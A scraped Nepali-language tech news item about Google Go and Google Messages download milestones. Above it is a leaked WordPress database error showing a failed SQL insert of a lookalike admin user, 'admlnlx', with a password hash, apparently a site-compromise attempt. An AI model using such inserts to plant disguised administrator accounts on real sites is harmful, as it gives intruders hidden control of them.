WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/IZZY4xdFc197FaKTAAiedcRxIRTe/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 10:35:03', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १५ असार, काठमान्डौ । सन् २०१७ को डिसेम्बरमा लञ्च भएको गुगल गो सन् २०१८ को सेप्टेम्बरमै १ करोड पटक डाउनलोड भएको थियो ।
एन्ड्रोइड गो अपरेटिङ्ग सिस्टममा प्रिइन्स्टल्ड भएको हुनाले पनि गुगल गो को सुरुवाती डाउनलोड उच्च देखिएको थियो । तर पछिल्लो समयमा भने गुगल गो का प्रयोगकर्ताको संख्यामा उल्लेखनीय वृद्धि देखिएको छ ।
सुरुआती चरणका स्मार्टफोन प्रयोगकर्ताका लागि लक्षित गरी गुगलले एन्ड्रोइड गो अपरेटिंग सिस्टम ल्याएको थियो । खासगरी न्यून मूल्यका स्मार्टफोन प्रयोगकर्तालाई समेत गुगलको समग्र अनुभव प्रदान गर्नु गुगल गो को लक्ष्य रहेको कम्पनीले यसको लञ्चका क्रममा बताएको थियो ।
स्मरण रहोस् गत महिना गुगल मेसेज एप प्ले स्टोरमा ५० करोड पटक इन्स्टल हुने कोसेढुंगा पार गरेको थियो । यद्यपि गुगलले सबै एन्ड्रोइड मोबाइल फोनमा यो मेसेज एप प्रिइन्स्टल गर्न अनिवार्य गरेको छैन ।
तथापि गुगलको पिक्सेल फोनका साथै नोकिया र हुवावेको एन्ड्रोइड वन फोनमा एसएमएसका लागि गुगल मेसेज डिफल्ट एपको रुपमा राखिएको छ ।
एजेन्सीको सहयोगमा